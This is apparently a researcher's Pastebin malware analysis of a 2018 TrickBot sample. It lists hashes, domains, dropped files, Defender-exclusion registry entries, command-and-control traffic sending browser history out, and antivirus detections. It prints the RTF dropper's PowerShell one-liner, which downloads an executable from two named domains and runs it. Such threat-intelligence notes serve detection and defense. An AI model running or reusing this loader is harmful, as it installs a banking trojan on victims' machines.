API tools faq
paste
Advertisement
Neonprimetime

2018-05-15 trickbot sample

Neonprimetime
May 15th, 2018
390
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.54 KB | None | 0 0
raw download clone embed print report
  1. #malware #trickbot
  2. found by @neonprimetime security
  3.  
  4. sample: https://www.reverse.it/sample/4087601bfc591c48bf90026164dde735b91f08898fbef13f0e85c8e64fc79487?environmentId=120
  5.  
  6. iocs:
  7. correspondence.doc
  8. fd55b840d747fc0601b03f53d5d3d314
  9. task.bat
  10. D7746CD2D5E2BBF4961704E76A13EECB
  11. digitalmindsolution.com
  12. thirdeyetv.com
  13. lewl.bin
  14. greg4545.exe
  15. A6DCE7423960304106B6AD8D7F7D9FAD
  16.  
  17. copied itself to:
  18. C:\Users\xxxxx\AppData\Roaming\winhttp\
  19. launched it's own copy of svchost.exe
  20.  
  21. files created:
  22. C:\Users\Win7\AppData\Roaming\winhttp\FAQ
  23. C:\Users\Win7\AppData\Roaming\winhttp\README.md
  24. C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64 ( md5,861CFB79C14293F1DA731E42B90BD811 )
  25. C:\Users\Win7\AppData\Roaming\winhttp\Modules\systeminfo64 ( md5,5D4512296AA66BFC0F2AE610556D84F2 )
  26. C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dinj (md5,7AED4235BC16913C98DCC866C087F38C)
  27. C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\dpost (md5,15B4898CF67FF914DBA1EEF3BC6C9646)
  28. C:\Users\Win7\AppData\Roaming\winhttp\Modules\injectDll64_configs\sinj (md5,2DFB40BAA7110C0418DA49F997710A9E)
  29.  
  30. registries added:
  31. HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
  32. HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
  33. HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Win7\AppData\Roaming\winhttp\: 0x00000000
  34.  
  35.  
  36. network connections:
  37. GET /ip HTTP/1.1
  38. Connection: Keep-Alive
  39. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  40. Host: ipinfo.io
  41.  
  42. POST /ser0514ca/[REDACTED PC NAME]_W617601.5A9716C6537690A1A0AA513B7AEF3301/82/ HTTP/1.1
  43. Accept: */*
  44. User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  45. Host: 70.182.4.158
  46. Content-Disposition: form-data; name="data"
  47. **** REDACTED LIST OF FILES I HAD OPEN AND URLS I HAD OPEN IN BROWSER ****
  48. Content-Disposition: form-data; name="source"
  49. IE history
  50.  
  51.  
  52. interesting in memory strings:
  53. 0x1e276a (90): C:\Users\Win7\AppData\Roaming\winhttp\bad.exe
  54.  
  55.  
  56. script in the rtf:
  57.  
  58. PowerShell ""function irJohn74([String] $KingOfSleep){(New-Object System.Net.WebClient).DownloadFile($KingOfSleep,'%TEMP%\greg4545.exe');Start-Process '%TEMP%\greg4545.exe';}try{irJohn74('http://digitalmindsolution.com/lewl.bin')}catch{irJohn74('http://thirdeyetv.com/lewl.bin')}""
  59.  
  60. vt hits for RTF/DOC:
  61. MicroWorld-eScan,Exploit.RTF-PSH.Gen,14.05.2018,1
  62. CAT-QuickHeal,Exp.RTF.Heur.Gen.A,14.05.2018,1
  63. McAfee,Exploit-CVE2017-11882.p,14.05.2018,1
  64. Arcabit,Exploit.RTF-PSH.Gen,14.05.2018,1
  65. Kaspersky,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
  66. BitDefender,Exploit.RTF-PSH.Gen,14.05.2018,1
  67. Ad-Aware,Exploit.RTF-PSH.Gen,14.05.2018,1
  68. Sophos,Exp/201711882-M,14.05.2018,1
  69. F-Secure,Exploit.RTF-PSH.Gen,14.05.2018,1
  70. TrendMicro,HEUR_RTFMALFORM,14.05.2018,1
  71. McAfee-GW-Edition,Exploit-CVE2017-11882.p,14.05.2018,1
  72. Emsisoft,Exploit.RTF-PSH.Gen (B),14.05.2018,1
  73. Avira,EXP/CVE-2017-11882.Gen,14.05.2018,1
  74. AegisLab,Exploit.Msoffice.Generic!c,14.05.2018,1
  75. ZoneAlarm,HEUR:Exploit.MSOffice.Generic,14.05.2018,1
  76. GData,Exploit.CVE-2017-11882.Gen,14.05.2018,1
  77. ALYac,Exploit.RTF-PSH.Gen,14.05.2018,1
  78. MAX,malware (ai score=81),14.05.2018,1
  79. Tencent,Office.Exploit.Generic.Efar,14.05.2018,1
  80. Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1
  81. Qihoo-360,Win32/Trojan.Exploit.ed7,14.05.2018,1
  82.  
  83. vt hits for EXE:
  84. MicroWorld-eScan,Trojan.GenericKD.40242422,15.05.2018,0
  85. Cylance,Unsafe,15.05.2018,0
  86. Invincea,heuristic,03.05.2018,12
  87. Symantec,ML.Attribute.HighConfidence,14.05.2018,1
  88. TrendMicro-HouseCall,Suspicious_GEN.F47V0514,15.05.2018,0
  89. Avast,FileRepMalware,15.05.2018,0
  90. Kaspersky,UDS:DangerousObject.Multi.Generic,15.05.2018,0
  91. Babable,Malware.HighConfidence,06.04.2018,39
  92. AegisLab,Ml.Attribute.Gen!c,15.05.2018,0
  93. Ad-Aware,Trojan.GenericKD.40242422,15.05.2018,0
  94. McAfee-GW-Edition,BehavesLike.Win32.Ransomware.gh,14.05.2018,1
  95. SentinelOne,static engine - malicious,25.02.2018,79
  96. Webroot,W32.Malware.Gen,15.05.2018,0
  97. Endgame,malicious (high confidence),07.05.2018,8
  98. ZoneAlarm,Trojan.Win32.Inject.ajogy,15.05.2018,0
  99. McAfee,Artemis!A6DCE7423960,15.05.2018,0
  100. VBA32,BScope.Trojan.Inject,14.05.2018,1
  101. ESET-NOD32,Win32/TrickBot.AQ,15.05.2018,0
  102. Ikarus,PUA.Multibar,14.05.2018,1
  103. AVG,FileRepMalware,15.05.2018,0
  104. Paloalto,generic.ml,15.05.2018,0
  105.  
  106. vt hists for batch script:
  107. McAfee,PS/Agent.u,14.05.2018,1
  108. McAfee-GW-Edition,PS/Agent.u,14.05.2018,1
  109. Fortinet,PowerShell/Agent.C1546!tr.dldr,14.05.2018,1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!